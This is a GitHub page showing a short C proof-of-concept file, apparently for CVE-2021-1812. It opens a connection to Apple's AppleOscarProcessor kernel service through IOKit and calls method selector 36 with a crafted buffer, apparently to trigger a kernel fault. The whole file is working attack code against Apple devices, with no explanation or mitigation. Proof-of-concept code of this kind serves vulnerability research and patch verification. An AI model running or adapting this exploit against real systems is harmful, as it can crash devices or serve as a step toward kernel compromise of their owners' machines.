-
Notifications
You must be signed in to change notification settings - Fork 30
/
CVE-2021-1812.c
43 lines (39 loc) · 1.77 KB
/
CVE-2021-1812.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include <stdio.h>
#include <stdint.h>
#include <mach/mach.h>
#include <CoreFoundation/CoreFoundation.h>
typedef mach_port_t io_object_t;
typedef io_object_t io_service_t;
typedef io_object_t io_connect_t;
extern const mach_port_t kIOMasterPortDefault;
kern_return_t IOObjectRelease(io_object_t object);
kern_return_t IOServiceOpen(io_service_t service, task_t task, uint32_t type, io_connect_t *client);
kern_return_t IOServiceClose(io_connect_t client);
io_service_t IOServiceGetMatchingService(mach_port_t master, CFDictionaryRef matching CF_RELEASES_ARGUMENT);
CFMutableDictionaryRef IOServiceMatching(const char *name) CF_RETURNS_RETAINED;
kern_return_t IOConnectCallMethod(io_connect_t client, uint32_t selector, const uint64_t *in, uint32_t inCnt, const void *inStruct, size_t inStructCnt, uint64_t *out, uint32_t *outCnt, void *outStruct, size_t *outStructCnt);
int main(){
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("AppleOscarProcessor"));
io_connect_t conn;
int type = 0;
uint32_t ret = IOServiceOpen(service, mach_task_self(), type, &conn);
if (ret != KERN_SUCCESS){
printf("Can't open connection ret: 0x%X\n", ret);
return -1;
}
size_t outStrSz = 0x1000;
uint64_t *outStr = malloc(outStrSz);
memset(outStr, 0xBB, outStrSz);
size_t inputStrSz = 0x6D;
uint64_t *inputStr = malloc(inputStrSz);
memset(inputStr, 0x41, inputStrSz);
ret = IOConnectCallMethod(conn, 1, 0, 0, 0, 0, 0, 0, 0, 0);
if(ret)
printf("won't panic\n");
ret = IOConnectCallMethod(conn, 36, 0, 0, &inputStr, inputStrSz, NULL, NULL, &outStr, &outStrSz);
if (ret == KERN_SUCCESS)
printf("Success\n");
else
printf("Failure: 0x%X %s\n", ret, mach_error_string(ret));
return 0;
}